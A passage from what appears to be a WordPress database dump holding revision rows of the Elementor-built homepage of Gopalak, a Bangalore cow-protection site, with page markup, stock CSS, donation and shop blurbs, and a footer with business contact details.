.5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n																<a href=\"https://gopalak.in\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-28 11:13:23','2022-10-28 05:43:23','',1373,'https://gopalak.in/?p=2009',0,'revision','',0),(2011,1,'2022-10-28 12:04:56','2022-10-28 06:34:56','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n																<a href=\"https://gopalak.in\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-28 12:04:56','2022-10-28 06:34:56','',1373,'https://gopalak.in/?p=2011',0,'revision','',0),(2012,1,'2022-10-28 12:04:56','2022-10-28 06:34:56','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a 